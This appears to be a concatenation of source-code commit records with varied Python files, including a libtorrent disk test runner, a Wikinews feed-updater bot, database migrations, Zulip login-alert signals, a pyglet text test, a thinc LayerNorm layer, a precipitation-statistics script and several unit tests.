config = {'test': 'dual', 'save-path': os.path.join('./', fs), 'num-peers': num_peers, 'allow-disk-reorder': reorder, 'cache-size': cache_size, 'read-ahead': readahead}
return config
def build_target_folder(config):
reorder = 'reorder'
if config['allow-disk-reorder'] == False: reorder = 'no-reorder'
readahead = 'readahead'
if config['read-ahead'] == False: readahead = 'no-readahead'
return 'results_%d_%d_%s_%s_%s_%s' % (config['num-peers'], config['cache-size'], os.path.split(config['save-path'])[1], config['test'], reorder, readahead)
def run_test(config):
if os.path.exists(build_target_folder(config)):
print 'results already exists, skipping test'
return
# make sure any previous test file is removed
delete_files([os.path.join(config['save-path'], 'stress_test_file'), '.ses_state', '.resume', '.dht_state', 'session_stats'])
try: os.mkdir('session_stats')
except: pass
# save off the command line for reference
global port
cmdline = build_commandline(config, port)
f = open('session_stats/cmdline.txt', 'w+')
f.write(cmdline)
f.close()
f = open('session_stats/config.txt', 'w+')
print >>f, config
f.close()
f = open('session_stats/client.output', 'w+')
print 'launching: %s' % cmdline
client = subprocess.Popen(shlex.split(cmdline), stdout=f)
time.sleep(1)
print '\n\n*********************************'
print '* RUNNING TEST *'
print '*********************************\n\n'
print 'launching connection tester'
os.system('./connection_tester %s %d 127.0.0.1 %d test.torrent >session_stats/tester.output' % (config['test'], config['num-peers'], port))
f.close()
# run fragmentation test
print 'analyzing fragmentation'
os.system('./fragmentation_test test.torrent %s' % config['save-path'])
shutil.copy('fragmentation.log', 'session_stats/')
shutil.copy('fragmentation.png', 'session_stats/')
shutil.copy('fragmentation.gnuplot', 'session_stats/')
os.chdir('session_stats')
# parse session stats
print 'parsing session log'
os.system('python ../../parse_session_stats.py *.0000.log')
os.chdir('..')
# move the results into its final place
print 'saving results'
os.rename('session_stats', build_target_folder(config))
# clean up
print 'cleaning up'
delete_files([os.path.join(config['save-path'], 'stress_test_file'), '.ses_state', '.resume', '.dht_state'])
port += 1
for fs in filesystem:
config = build_test_config(fs, filesystem_peers, filesystem_cache)
run_test(config)
for c in cache_sizes:
for p in peers:
for rdahead in [True, False]:
for reorder in [True, False]:
config = build_test_config(fs, filesystem_peers, filesystem_cache, rdahead, reorder)
run_test(config)
| Python | 0.000004 | |
b3a16addda494428a69b80fe7d32b07520e1d292 | Create wikinews-updater.py | wikinews-updater.py | wikinews-updater.py | #!/usr/bin/env python
# -- coding: utf-8 --
import time
import requests
import login
wn_API = "https://ru.wikinews.org/w/api.php"
wp_API = "https://ru.wikipedia.org/w/api.php"
ua = {"User-agent": "pyBot/latestnews (toolforge/iluvatarbot; iluvatar@tools.wmflabs.org) requests (python3)"}
token, cookies = login.login(server="ru.wikipedia")
tasks = [
{"category": "Бизнес", "landing": "Проект:Компании/Викиновости/Бизнес", "count": 20},
{"category": "Екатеринбург", "landing": "Портал:Екатеринбург/Викиновости", "count": 7},
{"category": "Казань", "landing": "Портал:Казань/Викиновости", "count": 7},
{"category": "Музыка", "landing": "Портал:Музыка/Викиновости", "count": 10},
{"category": "ООН", "landing": "Портал:Организация Объединённых Наций/Викиновости", "count": 10},
{"category": "Республика Татарстан", "landing": "Портал:Татарстан/Викиновости", "count": 7},
{"category": "Санкт-Петербург", "landing": "Портал:Санкт-Петербург/Викиновости", "count": 10},
{"category": "Свердловская область", "landing": "Портал:Свердловская область/Викиновости", "count": 7},
{"category": "Урал", "landing": "Портал:Урал/Викиновости", "count": 7},
{"category": "Футбол", "landing": "Портал:Футбол/Викиновости", "count": 10},
{"category": "Хоккей с шайбой", "landing": "Портал:Хоккей/Викиновости/Хоккей с шайбой", "count": 10},
{"category": "Экономика", "landing": "Портал:Экономика/Викиновости", "count": 15}
]
def handler(members, task):
news = []
i = 0
for member in members:
if check(member["title"]):
i += 1
news.append("* {{news|" + str(member["title"]) + "}}")
if i >= task["count"]:
break
if len(news) > 0:
params = {
"action": "edit", "format": "json", "utf8": "1", "title": str(task["landing"]), "nocreate": 1,
"text": "\n".join(news), "summary": "Обновление ленты новостей", "token": token
}
requests.post(url=wp_API, data=params, cookies=cookies)
def check(page):
params = {
"action": "query", "format": "json", "utf8": "1", "prop": "templates", "titles": page, "tlnamespace": 10,
"tllimit": 500, "tltemplates": "Шаблон:Публиковать"
}
res = requests.post(url=wn_API, data=params, headers=ua).json()["query"]["pages"]
if len(res) > 0:
n = ""
for r in res:
n = r
break
if "templates" in res[n]:
if len(res[n]["templates"]) > 0:
return True
return False
def getData(task):
try:
params = {
"action": "query", "format": "json", "utf8": "1", "list": "categorymembers",
"cmtitle": "Категория:" + str(task["category"]), "cmprop": "timestamp|ids|title", "cmnamespace": 0,
"cmtype": "page", "cmlimit": 500, "cmsort": "timestamp", "cmdir": "older"
}
res = requests.post(url=wn_API, data=params, headers=ua).json()["query"]["categorymembers"]
except:
time.sleep(30)
getData()
else:
handler(res, task)
for task in tasks:
getData(task)
| Python | 0 | |
d0474ea69c9bcc5b07829603778e0277d1fd733a | fix moved Glottolog identifier of nepa1252 | migrations/versions/1715ee79365_fix_missing_nepa1252_identifier.py | migrations/versions/1715ee79365_fix_missing_nepa1252_identifier.py | # coding=utf-8
"""fix missing nepa1252 identifier
Revision ID: 1715ee79365
Revises: 506dcac7d75
Create Date: 2015-04-15 19:34:27.655000
"""
# revision identifiers, used by Alembic.
revision = '1715ee79365'
down_revision = '506dcac7d75'
import datetime
from alembic import op
import sqlalchemy as sa
def upgrade():
id, name = 'nepa1252', 'Nepali'
insert_ident = sa.text('INSERT INTO identifier '
'(created, updated, active, version, type, description, lang, name) '
'SELECT now(), now(), true, 1, :type, :description, :lang, :name '
'WHERE NOT EXISTS (SELECT 1 FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name)'
).bindparams(type='name', description='Glottolog', lang='en')
insert_lang_ident = sa.text('INSERT INTO languageidentifier '
'(created, updated, active, version, language_pk, identifier_pk) '
'SELECT now(), now(), true, 1, '
'(SELECT pk FROM language WHERE id = :id), '
'(SELECT pk FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name) '
'WHERE NOT EXISTS (SELECT 1 FROM languageidentifier '
'WHERE language_pk = (SELECT pk FROM language WHERE id = :id) '
'AND identifier_pk = (SELECT pk FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name))'
).bindparams(type='name', description='Glottolog', lang='en')
op.execute(insert_ident.bindparams(name=name))
op.execute(insert_lang_ident.bindparams(id=id, name=name))
def downgrade():
pass
| Python | 0 | |
18e66983c49c68e9000acd331d6888c4c72a99b3 | Fix mypy error. | zerver/signals.py | zerver/signals.py | from __future__ import absolute_import
from django.dispatch import receiver
from django.contrib.auth.signals import user_logged_in
from django.core.mail import send_mail
from django.conf import settings
from django.template import loader
from django.utils import timezone
from typing import Any, Dict, Optional
from zerver.models import UserProfile
def get_device_browser(user_agent):
# type: (str) -> Optional[str]
user_agent = user_agent.lower()
if "chrome" in user_agent and "chromium" not in user_agent:
return 'Chrome'
elif "firefox" in user_agent and "seamonkey" not in user_agent and "chrome" not in user_agent:
return "Firefox"
elif "chromium" in user_agent:
return "Chromium"
elif "safari" in user_agent and "chrome" not in user_agent and "chromium" not in user_agent:
return "Safari"
elif "opera" in user_agent:
return "Opera"
elif "msie" in user_agent or "trident" in user_agent:
return "Internet Explorer"
elif "edge" in user_agent:
return "Edge"
else:
return None
def get_device_os(user_agent):
# type: (str) -> Optional[str]
user_agent = user_agent.lower()
if "windows" in user_agent:
return "Windows"
elif "macintosh" in user_agent:
return "MacOS"
elif "linux" in user_agent and "android" not in user_agent:
return "Linux"
elif "android" in user_agent:
return "Android"
elif "like mac os x" in user_agent:
return "iOS"
else:
return None
@receiver(user_logged_in, dispatch_uid="only_on_login")
def email_on_new_login(sender, user, request, **kwargs):
# type: (Any, UserProfile, Any, Any) -> None
# We import here to minimize the dependencies of this module,
# since it runs as part of `manage.py` initialization
from zerver.context_processors import common_context
if not settings.SEND_LOGIN_EMAILS:
return
if request:
# Login emails are for returning users, not new registrations.
# Determine if login request was from new registration.
path = request.META.get('PATH_INFO', None)
if path:
if path == "/accounts/register/":
return
login_time = timezone.now().strftime('%A, %B %d, %Y at %I:%M%p ') + \
timezone.get_current_timezone_name()
user_agent = request.META.get('HTTP_USER_AGENT', "").lower()
device_browser = get_device_browser(user_agent)
device_os = get_device_os(user_agent)
device_ip = request.META.get('REMOTE_ADDR') or "Uknown IP address"
device_info = {"device_browser": device_browser,
"device_os": device_os,
"device_ip": device_ip,
"login_time": login_time
}
context = common_context(user)
context['device_info'] = device_info
context['zulip_support'] = settings.ZULIP_ADMINISTRATOR
context['user'] = user
text_template = 'zerver/emails/new_login/new_login_alert.txt'
html_template = 'zerver/emails/new_login/new_login_alert.html'
text_content = loader.render_to_string(text_template, context)
html_content = loader.render_to_string(html_template, context)
sender = settings.NOREPLY_EMAIL_ADDRESS
recipients = [user.email]
subject = loader.render_to_string('zerver/emails/new_login/new_login_alert.subject').strip()
send_mail(subject, text_content, sender, recipients, html_message=html_content)
| from __future__ import absolute_import
from django.dispatch import receiver
from django.contrib.auth.signals import user_logged_in
from django.core.mail import send_mail
from django.conf import settings
from django.template import loader
from django.utils import timezone
from typing import Any, Dict, Optional
def get_device_browser(user_agent):
# type: (str) -> Optional[str]
user_agent = user_agent.lower()
if "chrome" in user_agent and "chromium" not in user_agent:
return 'Chrome'
elif "firefox" in user_agent and "seamonkey" not in user_agent and "chrome" not in user_agent:
return "Firefox"
elif "chromium" in user_agent:
return "Chromium"
elif "safari" in user_agent and "chrome" not in user_agent and "chromium" not in user_agent:
return "Safari"
elif "opera" in user_agent:
return "Opera"
elif "msie" in user_agent or "trident" in user_agent:
return "Internet Explorer"
elif "edge" in user_agent:
return "Edge"
else:
return None
def get_device_os(user_agent):
# type: (str) -> Optional[str]
user_agent = user_agent.lower()
if "windows" in user_agent:
return "Windows"
elif "macintosh" in user_agent:
return "MacOS"
elif "linux" in user_agent and "android" not in user_agent:
return "Linux"
elif "android" in user_agent:
return "Android"
elif "like mac os x" in user_agent:
return "iOS"
else:
return None
@receiver(user_logged_in, dispatch_uid="only_on_login")
def email_on_new_login(sender, user, request, **kwargs):
# type: (Any, UserProfile, Any, Any) -> None
# We import here to minimize the dependencies of this module,
# since it runs as part of `manage.py` initialization
from zerver.context_processors import common_context
from zerver.models import UserProfile
if not settings.SEND_LOGIN_EMAILS:
return
if request:
# Login emails are for returning users, not new registrations.
# Determine if login request was from new registration.
path = request.META.get('PATH_INFO', None)
if path:
if path == "/accounts/register/":
return
login_time = timezone.now().strftime('%A, %B %d, %Y at %I:%M%p ') + \
timezone.get_current_timezone_name()
user_agent = request.META.get('HTTP_USER_AGENT', "").lower()
device_browser = get_device_browser(user_agent)
device_os = get_device_os(user_agent)
device_ip = request.META.get('REMOTE_ADDR') or "Uknown IP address"
device_info = {"device_browser": device_browser,
"device_os": device_os,
"device_ip": device_ip,
"login_time": login_time
}
context = common_context(user)
context['device_info'] = device_info
context['zulip_support'] = settings.ZULIP_ADMINISTRATOR
context['user'] = user
text_template = 'zerver/emails/new_login/new_login_alert.txt'
html_template = 'zerver/emails/new_login/new_login_alert.html'
text_content = loader.render_to_string(text_template, context)
html_content = loader.render_to_string(html_template, context)
sender = settings.NOREPLY_EMAIL_ADDRESS
recipients = [user.email]
subject = loader.render_to_string('zerver/emails/new_login/new_login_alert.subject').strip()
send_mail(subject, text_content, sender, recipients, html_message=html_content)
| Python | 0 |
2749b4b754562c45a54b3df108c5c40c8d548038 | Create __init__.py | web/__init__.py | web/__init__.py | Python | 0.000429 | ||
1396ff4ab4e6664c265f97958951815a525f7823 | Remove confusing navigation tabs from header. | reddit_donate/pages.py | reddit_donate/pages.py | from r2.lib.pages import Reddit
from r2.lib.wrapped import Templated
class DonatePage(Reddit):
extra_stylesheets = Reddit.extra_stylesheets + ["donate.less"]
def __init__(self, title, content, **kwargs):
Reddit.__init__(
self,
title=title,
content=content,
show_sidebar=False,
**kwargs
)
def build_toolbars(self):
# get rid of tabs on the top
return []
class DonateLanding(Templated):
pass
| from r2.lib.pages import Reddit
from r2.lib.wrapped import Templated
class DonatePage(Reddit):
extra_stylesheets = Reddit.extra_stylesheets + ["donate.less"]
def __init__(self, title, content, **kwargs):
Reddit.__init__(
self,
title=title,
content=content,
show_sidebar=False,
**kwargs
)
class DonateLanding(Templated):
pass
| Python | 0 |
307feb3f32fa31faa5754616a1e78c9ad03b0483 | test to demonstrate bug 538 | tests/text/ELEMENT_CHANGE_STYLE.py | tests/text/ELEMENT_CHANGE_STYLE.py | #!/usr/bin/env python
'''Test that inline elements can have their style changed, even after text
has been deleted before them. [This triggers bug 538 if it has not yet been fixed.]
To run the test, delete the first line, one character at a time,
verifying that the element remains visible and no tracebacks are
printed to the console.
Press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import unittest
import pyglet
from pyglet.text import caret, document, layout
doctext = '''ELEMENT.py test document.
PLACE CURSOR AT THE END OF THE ABOVE LINE, AND DELETE ALL ITS TEXT,
BY PRESSING THE DELETE KEY REPEATEDLY.
IF THIS WORKS OK, AND THE ELEMENT (GRAY RECTANGLE) WITHIN THIS LINE
[element here]
REMAINS VISIBLE BETWEEN THE SAME CHARACTERS, WITH NO ASSERTIONS PRINTED TO
THE CONSOLE, THE TEST PASSES.
(In code with bug 538, the element sometimes moves within the text, and
eventually there is an assertion failure. Note that there is another bug,
unrelated to this one, which sometimes causes the first press of the delete
key to be ignored.)
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Fusce venenatis
pharetra libero. Phasellus lacinia nisi feugiat felis. Sed id magna in nisl
cursus consectetuer. Aliquam aliquam lectus eu magna. Praesent sit amet ipsum
vitae nisl mattis commodo. Aenean pulvinar facilisis lectus. Phasellus sodales
risus sit amet lectus. Suspendisse in turpis. Vestibulum ac mi accumsan eros
commodo tincidunt. Nullam velit. In pulvinar, dui sit amet ullamcorper dictum,
dui risus ultricies nisl, a dignissim sapien enim sit amet tortor.
Pellentesque fringilla, massa sit amet bibendum blandit, pede leo commodo mi,
eleifend feugiat neque tortor dapibus mauris. Morbi nunc arcu, tincidunt vel,
blandit non, iaculis vel, libero. Vestibulum sed metus vel velit scelerisque
varius. Vivamus a tellus. Proin nec orci vel elit molestie venenatis. Aenean
fringilla, lorem vel fringilla bibendum, nibh mi varius mi, eget semper ipsum
ligula ut urna. Nullam tempor convallis augue. Sed at dui.
'''
element_index = doctext.index('[element here]')
doctext = doctext.replace('[element here]', '')
class TestElement(document.InlineElement):
vertex_list = None
def place(self, layout, x, y):
## assert layout.document.text[self._position] == '\x00'
### in bug 538, this fails after two characters are deleted.
self.vertex_list = layout.batch.add(4, pyglet.gl.GL_QUADS,
layout.top_group,
'v2i',
('c4B', [200, 200, 200, 255] * 4))
y += self.descent
w = self.advance
h = self.ascent - self.descent
self.vertex_list.vertices[:] = (x, y,
x + w, y,
x + w, y + h,
x, y + h)
def remove(self, layout):
self.vertex_list.delete()
del self.vertex_list
class TestWindow(pyglet.window.Window):
def __init__(self, *args, **kwargs):
super(TestWindow, self).__init__(*args, **kwargs)
self.batch = pyglet.graphics.Batch()
self.document = pyglet.text.decode_attributed(doctext)
for i in [element_index]:
self.document.insert_element(i, TestElement(60, -10, 70))
self.margin = 2
self.layout = layout.IncrementalTextLayout(self.document,
self.width - self.margin * 2, self.height - self.margin * 2,
multiline=True,
batch=self.batch)
self.caret = caret.Caret(self.layout)
self.push_handlers(self.caret)
self.set_mouse_cursor(self.get_system_mouse_cursor('text'))
def on_draw(self):
pyglet.gl.glClearColor(1, 1, 1, 1)
self.clear()
self.batch.draw()
def on_key_press(self, symbol, modifiers):
super(TestWindow, self).on_key_press(symbol, modifiers)
if symbol == pyglet.window.key.TAB:
self.caret.on_text('\t')
self.document.set_style(0, len(self.document.text), dict(bold = None)) ### trigger bug 538
class TestCase(unittest.TestCase):
def test(self):
self.window = TestWindow(##resizable=True,
visible=False)
self.window.set_visible()
pyglet.app.run()
if __name__ == '__main__':
unittest.main()
| Python | 0 | |
3df697b29931025a9c6f3f809eda2260d4211305 | Add LayerNorm class | thinc/neural/_classes/layernorm.py | thinc/neural/_classes/layernorm.py | from ... import describe
from .model import Model
def _init_to_one(W, ops):
W.fill(1.)
def _run_child_hooks(model, X, y=None):
for hook in model.child.on_data_hooks:
hook(model.child, X, y)
model.nO = model.child.nO
@describe.on_data(_run_child_hooks)
@describe.attributes(
G=describe.Weights("Scaling vector",
lambda obj: (obj.nO,), _init_to_one),
b=describe.Biases("Bias vector",
lambda obj: (obj.nO,)),
d_G=describe.Gradient("G"),
d_b=describe.Gradient("b")
)
class LayerNorm(Model):
name = 'layernorm'
def __init__(self, child, **kwargs):
self.child = child
self._layers = [child]
if 'nO' in kwargs:
self.nO = kwargs['nO']
elif getattr(child, 'nO', None):
self.nO = child.nO
self.nr_upd = 0
Model.__init__(self, **kwargs)
def predict(self, X):
X = self.child.predict(X)
N, mu, var = _get_moments(self.ops, X)
Xh = _forward(self.ops, X, mu, var)
y = Xh * self.G + self.b
return y
def begin_update(self, X, drop=0.):
X, backprop_child = self.child.begin_update(X, drop=0.)
N, mu, var = _get_moments(self.ops, X)
Xhat = _forward(self.ops, X, mu, var)
y, backprop_rescale = self._begin_update_scale_shift(Xhat)
def finish_update(dy, sgd=None):
dy = backprop_rescale(dy, sgd)
dist, sum_dy, sum_dy_dist = _get_d_moments(self.ops, dy, X, mu)
d_xhat = N * dy - sum_dy - dist * var**(-1.) * sum_dy_dist
d_xhat *= var ** (-1. / 2)
d_xhat /= N
return backprop_child(d_xhat, sgd)
drop *= getattr(self.child, 'drop_factor', 1.0)
y, bp_dropout = self.ops.dropout(y, drop)
assert y.dtype == 'float32'
return y, bp_dropout(finish_update)
def _begin_update_scale_shift(self, input__BI):
def finish_update(gradient__BI, sgd=None):
self.d_b += gradient__BI.sum(axis=0)
d_G = self.d_G
d_G += (gradient__BI * input__BI).sum(axis=0)
if sgd is not None:
sgd(self._mem.weights, self._mem.gradient, key=self.id)
return gradient__BI * self.G
return input__BI * self.G + self.b, finish_update
def _get_moments(ops, X):
mu = X.mean(axis=1, keepdims=True)
var = X.var(axis=1, keepdims=True) + 1e-08
return X.shape[0], mu, var
def _get_d_moments(ops, dy, X, mu):
dist = X-mu
return dist, ops.xp.sum(dy, axis=1, keepdims=True), ops.xp.sum(dy * dist, axis=1, keepdims=True)
def _forward(ops, X, mu, var):
return (X-mu) * var ** (-1./2.)
| Python | 0 | |
eefa1f039d935a7242bb14bdb6f672db1ff24302 | Create omega-virus.py | omega-virus.py | omega-virus.py | #!/usr/bin/python
#
# Insert docopt user help menu here?
#
#
# End docopt
#
def sectors()
# Blue
# Green
# Red
# Yellow
def roomList()
# List of rooms
# Green (open rooms)
# Blue (requires blue key)
# Red (requires red key)
# Yellow (requires yellow key)
def roomContents()
# Each room can have one of:
# 1. An ADV
# 2. An access card
# 3. A Probe (more on this in a little bit)
# 4. A hazard
# 5. The virus (presumably chilling out)
# 6. Nothing at all
def items()
# Access keys (Blue, Red, Yellow)
# Decoder - yellow
# Disruptor - blue
# Negatron - red
# Probe
def players()
# Blue
# Green
# Red
# Yellow
def rng()
# Random number generator
# Values 0,1,2
def secretCode()
# Secret codes let players know where the virus is provided:
# a) They enter a room where the virus is
# b) They do not have all three weapons
# c) Should we let probes find the virus?
| Python | 0 | |
2c9ff7a0c84c953b815da9db10cc24bbf34444e0 | Create precipitation.py | precipitation.py | precipitation.py | # -*- coding: utf8 -*-
import os
import numpy as np
from myfunctions import station,stationNo,DATAPATH,days36x
from variables import R
''' 要素 '''
precipitation = ['累计降水量','日降水量大于等于0.1mm日数','日降水量大于等于1mm日数',\
'小雨日数','中雨日数','大雨日数','暴雨日数']
# 定义函数 R_addtod,调用方式如下:
# d = R_addtod(filename,d)
def R_addtod(filename,d):
try:
x = R(filename)
except (IOError,TypeError,NameError):
d = ''
else:
d = np.hstack((d,x))
return d
''' 定义降水的计算函数 myreadaR
参数 above:表示日降水量大于等于 above
below:表示日降水小于等于 below
daysorsum:"days" 表示计算日数,"sum" 表示计算累计降水量
如统计累计降水量:
year,s = myreadaR('54525',1951,2013,1,12,1,31,0,99999,"sum") # 这里用 99999 表示不可能的大数
返回的 s 单位是 mm 或 d
'''
def myreadaR(stationnumber,startyear,endyear,startmonth,endmonth,startday,endday,above,below,daysorsum):
P = os.path.join(DATAPATH,stationnumber)
os.chdir(P)
years = np.arange(startyear,endyear+1)
s = np.arange(len(years),dtype=np.float32)
for i in s:
i = int(i)
daysfit = days36x(years[i])
''' 逐月处理,对空字数组 d 开始追加 '''
d = np.arange(0,dtype=np.float32)
if startmonth*100+startday <= endmonth*100+endday:
''' 起始月日早于或等于终止月日,不跨年 '''
months = np.arange(startmonth,endmonth+1)
for j in months:
filename = 'A'+stationnumber+'-'+str(years[i]*100+j)+'.TXT'
d = R_addtod(filename,d)
if d == '': break
else:
''' 起始月日晚于终止月日,跨年 '''
''' 第一年 '''
monthA = np.arange(startmonth,13)
for j in monthA:
filename = 'A'+stationnumber+'-'+str(years[i]*100+j)+'.TXT'
d = R_addtod(filename,d)
if d == '': break
''' 第二年 '''
if d != '':
# 第一年数据缺月,不再检索第二年的月
monthB = np.arange(1,endmonth+1)
for j in monthB:
filename = 'A'+stationnumber+'-'+str((years[i]+1)*100+j)+'.TXT'
d = R_addtod(filename,d)
if d == '': break
''' 月处理完毕,开始年处理 '''
if d == '':
s[i] = np.nan
else:
d = d[startday-1:]
if daysfit[j-1]-endday > 0:
d = d[::-1]
d = d[daysfit[j-1]-endday:]
d = d[::-1]
if np.sum(np.isnan(d))*4 >= len(d):
# 如果日值缺测率大于等于 1/4
s[i] = np.nan
else:
if daysorsum == 'sum':
s[i] = np.nansum((d>above*10)*(d<below*10)*d)
elif daysorsum == 'days':
s[i] = np.sum((d>above*10)*(d<below*10))
if daysorsum == 'sum':
# 单位由 0.1mm 转换为 mm
s = np.rint(s)*0.1
return years,s
''' 定义计算全市平均的函数 myreadaRM,调用方式比 myreadaR 少了参数 stationnumber
返回 years 为年份序列,s 为全市平均序列,z 为各站序列
'''
def myreadaRM(startyear,endyear,startmonth,endmonth,startday,endday,above,below,daysorsum):
z = np.zeros([len(station)-1,endyear-startyear+1])
n = np.arange(len(station)-1)
for i in n:
stationnumber = str(stationNo[i])
years,data = myreadaR(stationnumber,startyear,endyear,startmonth,endmonth,startday,endday,above,below,daysorsum)
z[i] = data
s = np.nanmean(z, axis=0)
# 注意保留一位小数
s = np.rint(s*10)*0.1
return years,z,s
| Python | 0.000082 | |
04f937a24279699164278d47fc5d0790a9062132 | add gunicorn.py | wsgi_gunicorn.py | wsgi_gunicorn.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from werkzeug.contrib.fixers import ProxyFix
from app import create_app
app = create_app()
app.wsgi_app = ProxyFix(app.wsgi_app)
if __name__ == '__main__':
app.run(host='0.0.0.0')
| Python | 0.007978 | |
6036f03328d4908b268fa1256b552d588dbcbfc8 | Add pytest unit test for Scenario Loop model. Refs #142 | tests/unit/test_scenarioloop.py | tests/unit/test_scenarioloop.py | # -*- coding: utf-8 -*-
"""
radish
~~~~~~
Behavior Driven Development tool for Python - the root from red to green
Copyright: MIT, Timo Furrer <tuxtimo@gmail.com>
"""
from radish.scenarioloop import ScenarioLoop
from radish.iterationscenario import IterationScenario
from radish.background import Background
from radish.stepmodel import Step
def test_creating_simple_scenarioloop():
"""
Test creating a simple ScenarioLoop
"""
# given & when
scenario = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# then
assert scenario.id == 1
assert scenario.keyword == 'Scenario Loop'
assert scenario.iterations_keyword == 'Iterations'
assert scenario.sentence == 'I am a Scenario Loop'
assert scenario.path == 'foo.feature'
assert scenario.line == 1
assert scenario.parent is None
assert scenario.tags == []
assert scenario.preconditions == []
assert scenario.background is None
def test_building_scenarioloop_scenarios(mocker):
"""
Test building Scenarios from a Scenario Loop
"""
# given
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# add steps
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when - build the scenarios
scenario_loop.build_scenarios()
# then - expect 2 built Scenarios
assert len(scenario_loop.scenarios) == 2
# then - expect that Scenarios are of type ExampleScenario
assert all(isinstance(x, IterationScenario) for x in scenario_loop.scenarios)
# then - expect correct Example Scenario sentences
assert scenario_loop.scenarios[0].sentence == 'I am a Scenario Loop - iteration 0'
assert scenario_loop.scenarios[1].sentence == 'I am a Scenario Loop - iteration 1'
# then - expect correctly replaced Step sentences
assert scenario_loop.scenarios[0].steps[0].sentence == 'Given I have 1'
assert scenario_loop.scenarios[0].steps[1].sentence == 'And I have 2'
assert scenario_loop.scenarios[0].steps[2].sentence == 'When I add those'
assert scenario_loop.scenarios[1].steps[0].sentence == 'Given I have 1'
assert scenario_loop.scenarios[1].steps[1].sentence == 'And I have 2'
assert scenario_loop.scenarios[1].steps[2].sentence == 'When I add those'
def test_building_scenarioloop_scenarios_with_background(mocker):
"""
Test building Scenarios from a Scenario Loop including a Background
"""
# given
background = Background('Background', 'I am a Background', 'foo.feature', 1, parent=None)
# add some Steps
background.steps.extend([
Step(1, 'Foo', 'foo.feature', 2, background, False),
Step(2, 'Foo', 'foo.feature', 3, background, False)
])
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=background)
# add steps
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when - build the scenarios
scenario_loop.build_scenarios()
# then - expect ExampleScenarios to have background copy assigned
assert scenario_loop.scenarios[0].background.sentence == 'I am a Background'
assert scenario_loop.scenarios[1].background.sentence == 'I am a Background'
def test_scenarioloop_afterparse_logic(mocker):
"""
Test Scenario Loop after parse logic
"""
# given
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# add steps
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when
scenario_loop.after_parse()
# then - expect 2 built Scenarios
assert len(scenario_loop.scenarios) == 2
assert scenario_loop.complete is True
| Python | 0 | |
d254428e484172ccd0a0763eb989241b08a26c3b | string compress kata second day | string-compress-kata/day-2.py | string-compress-kata/day-2.py | # -*- codeing: utf-8 -*-
class Compressor(object):
def compress(self, toCompress):
if toCompress is None:
return ""
else:
compressed = []
index = 0
length = len(toCompress)
while index < length:
counter = 1
index += 1
while index < length and toCompress[index] == toCompress[index - 1]:
counter += 1
index += 1
compressed.append(str(counter))
compressed.append(toCompress[index - 1])
return ''.join(compressed)
import unittest
class StringComperssorTest(unittest.TestCase):
def setUp(self):
self.compressor = Compressor()
def test_none_compresses_to_empty_string(self):
self.assertEqual("", self.compressor.compress(None))
def test_one_char_string(self):
self.assertEqual("1a", self.compressor.compress("a"))
def test_string_of_unique_chars(self):
self.assertEqual("1a1b1c", self.compressor.compress("abc"))
def test_string_of_duobled_chars(self):
self.assertEqual("2a2b2c", self.compressor.compress("aabbcc"))
def test_empty_string_compressed_into_empty_string(self):
self.assertEqual("", self.compressor.compress(""))
| Python | 0.999077 | |
a81f39089b4c60e2cb05ea892afacbcbea6f1c5d | add tests for oxml_parser | tests/oxml/test___init__.py | tests/oxml/test___init__.py | # encoding: utf-8
"""
Test suite for pptx.oxml.__init__.py module, primarily XML parser-related.
"""
from __future__ import print_function, unicode_literals
import pytest
from lxml import etree, objectify
from pptx.oxml import oxml_parser
class DescribeOxmlParser(object):
def it_enables_objectified_xml_parsing(self, xml_bytes):
foo = objectify.fromstring(xml_bytes, oxml_parser)
assert foo.bar == 'foobar'
def it_strips_whitespace_between_elements(self, foo, stripped_xml_bytes):
xml_bytes = etree.tostring(foo)
assert xml_bytes == stripped_xml_bytes
# ===========================================================================
# fixtures
# ===========================================================================
@pytest.fixture
def foo(xml_bytes):
return objectify.fromstring(xml_bytes, oxml_parser)
@pytest.fixture
def stripped_xml_bytes():
return (
'<a:foo xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/ma'
'in"><a:bar>foobar</a:bar></a:foo>'
).encode('utf-8')
@pytest.fixture
def xml_bytes():
return (
'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
'<a:foo xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/ma'
'in">\n'
' <a:bar>foobar</a:bar>\n'
'</a:foo>\n'
).encode('utf-8')
| Python | 0.000001 | |
f8c3feaf3f400cbcf3e04d9705f0cb36d083c6d7 | Include migratio for ProductPlan. | conductor/accounts/migrations/0012_productplan.py | conductor/accounts/migrations/0012_productplan.py | # Generated by Django 2.0.9 on 2018-11-08 02:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("accounts", "0011_auto_20180831_0320")]
operations = [
migrations.CreateModel(
name="ProductPlan",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("active", models.BooleanField(default=False)),
